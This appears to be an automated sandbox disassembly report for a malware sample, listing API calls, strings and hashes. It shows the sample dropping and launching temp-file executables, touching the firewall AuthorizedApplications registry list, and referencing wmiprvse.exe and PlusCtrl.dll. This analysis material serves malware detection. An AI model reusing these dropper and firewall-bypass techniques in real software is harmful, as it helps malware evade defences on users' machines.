Part of subcall function 7FE332CF: GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 7FE332E5
Part of subcall function 7FE332CF: wsprintfA.USER32 ref: 7FE332FA
Part of subcall function 7FE332CF: CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
Part of subcall function 7FE332CF: CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
Part of subcall function 7FE332CF: WSAStartup.WS2_32(00000101), ref: 7FE333D1
Part of subcall function 7FE332CF: Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: AddressCloseCreateFileHandleLibraryLoadModuleNameProcSleepStartupThreadwsprintf
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1694642180-621207024
Opcode ID: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction ID: 12527aadef34871a68a9f0f3636c4070517339c0fc18d64a5fb64a9bfd057a23
Opcode Fuzzy Hash: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction Fuzzy Hash: F031E471918715BFD7229A208C4EFEA366CDF41711F804219F85A9E081DAF46F06D6A5

Function 00401CB5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110libraryfileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52
CreateFileA.KERNEL32(PlusCtrl.dll,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401CF9
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00401D37

Strings

PlusCtrl.dll, xrefs: 00401C45, 00401CF4

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFileLibraryLoad
String ID: PlusCtrl.dll
API String ID: 4073770061-3813448905
Opcode ID: c6c2baf483a5c7817c0615bf604dfdbf5b4d22fa498cde7f9790926ec1ef48c2
Instruction ID: da15035d668b36466e8179076398aeffbcb361aec3f94f14ce4845e29cafbb59
Opcode Fuzzy Hash: c6c2baf483a5c7817c0615bf604dfdbf5b4d22fa498cde7f9790926ec1ef48c2
Instruction Fuzzy Hash: 214171715443019BE720CF34DD44B2BBBE4AB84764F140A2EF9A1B63F0E778D9458B9A

Function 00403D6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87sleepthreadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 00403E83

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000005), ref: 00403E6D

Strings

L8@, xrefs: 00403DC7
:8@, xrefs: 00403DDE
p8@, xrefs: 00403E00

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: :8@$L8@$p8@
API String ID: 896407411-1348165829
Opcode ID: 3e75125e98315a6c303164bdcc62422dc0ac1f7090f3bf2c4196777fe1904896
Instruction ID: c0699dc0de98f8c7b82e62ff3ffffc6daf283feedac10fb4a2c39f1d9fb6e09f
Opcode Fuzzy Hash: 3e75125e98315a6c303164bdcc62422dc0ac1f7090f3bf2c4196777fe1904896
Instruction Fuzzy Hash: 1821F3316043006BE3109B15DD45BABB7EAAFC8705F00093DF689B72C1DAB45A088BDB

Function 00403C60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000014), ref: 00403D53
ExitThread.KERNEL32 ref: 00403D65

Strings

L8@, xrefs: 00403CEB
:8@, xrefs: 00403CFC
p8@, xrefs: 00403D1E

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: :8@$L8@$p8@
API String ID: 896407411-1348165829
Opcode ID: 653889bf93ce3dc5ae69bcf3ca1f034d621d2bbf8dda7ff92a3885e57a6f8e2a
Instruction ID: 61c35c1a6ef796fb9a95b154365f1d274a12748536e75e316c168b2b6ba842ad
Opcode Fuzzy Hash: 653889bf93ce3dc5ae69bcf3ca1f034d621d2bbf8dda7ff92a3885e57a6f8e2a
Instruction Fuzzy Hash: 0321D131244304ABE3249B14DD16B6BB7A9EB84B04F00093DF689A72D1CBB59A08879A

Function 7FE326DF Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 7FE32703

Part of subcall function 7FE3271E: GetTempFileNameA.KERNEL32(?,7FE3271A,00000000,?), ref: 7FE3271F
Part of subcall function 7FE3271E: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE3271A,00000000,?), ref: 7FE3273A
Part of subcall function 7FE3271E: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE3276A
Part of subcall function 7FE3271E: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE32776
Part of subcall function 7FE3271E: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE3271A), ref: 7FE3279A

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction ID: e8ff87219964215428be11df8a01d81b33858c950305ba854321610fda46bc39
Opcode Fuzzy Hash: bf7059baa2945a1e10e6b512662fb3aa47ecbf22e134ef99b631c6adeccb2904
Instruction Fuzzy Hash: 1621C3B1645306BFE7215B20CC4DFEB7B2CEF86711F404114F94689081E7B1AE15C6A6

Function 00622768 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 0062278C

Part of subcall function 006227A7: GetTempFileNameA.KERNEL32(?,006227A3,00000000,?), ref: 006227A8
Part of subcall function 006227A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,006227A3,00000000,?), ref: 006227C3
Part of subcall function 006227A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,006227A3,00000000,?), ref: 006227F3
Part of subcall function 006227A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,006227A3,00000000,?), ref: 006227FF
Part of subcall function 006227A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,006227A3), ref: 00622823

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: f0251b56ee7af4157c7df50fe2b929d7d35b0229e94f199e9e6ecdc0e43652fd
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: 732102B1144616BFE7315A20DC9EFFF3A2DEF95B00F000118FA0989082D7B19E058AB6

Function 00424468 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 0042448C

Part of subcall function 004244A7: GetTempFileNameA.KERNEL32(?,004244A3,00000000,?), ref: 004244A8
Part of subcall function 004244A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,004244A3,00000000,?), ref: 004244C3
Part of subcall function 004244A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,004244A3,00000000,?), ref: 004244F3
Part of subcall function 004244A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,004244A3,00000000,?), ref: 004244FF
Part of subcall function 004244A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,004244A3), ref: 00424523

Memory Dump Source

Source File: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: File$CreateTemp$CloseHandleNamePathProcessWrite
String ID:
API String ID: 3982275768-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: ade2bb2f786261a5918a1b351a8f844443322dd67a8450dbd47c2130aefd2b38
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: D02105B1240216BFE7215A20DC4EFFF3A2CEFD5700F004519FA4989581D7F59E4586BA

Function 7FE3271E Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,7FE3271A,00000000,?), ref: 7FE3271F
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE3271A,00000000,?), ref: 7FE3273A
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE3276A
CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE3271A,00000000,?), ref: 7FE32776
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE3271A), ref: 7FE3279A

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction ID: 53811a8245002154d32b689494dec5e7fa63c0c5570ca99e0030f64d1e6d62be
Opcode Fuzzy Hash: 46a42b1a7938ce57373cf3b37306313736b16861edf51c12b33c8459ee93000f
Instruction Fuzzy Hash: C91161B1600605BFE7251B20CC4DFEB7A2CEF89B11F404518FA4698480EBF1AE1186A5

Function 006227A7 Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,006227A3,00000000,?), ref: 006227A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,006227A3,00000000,?), ref: 006227C3
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,006227A3,00000000,?), ref: 006227F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,006227A3,00000000,?), ref: 006227FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,006227A3), ref: 00622823

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: File$Create$CloseHandleNameProcessTempWrite
String ID:
API String ID: 463619559-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: a6986dfba7254dbe453632d597a5047be3938c9d4990d5f82cce52c44193abb5
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: 1B1184B1100A16BBFB250F20DC5DFFF7A2DEF84B10F004519FA0A99080DBF59E5196A8

Function 004244A7 Relevance: 7.6, APIs: 5, Instructions: 65fileprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,004244A3,00000000,?), ref: 004244A8
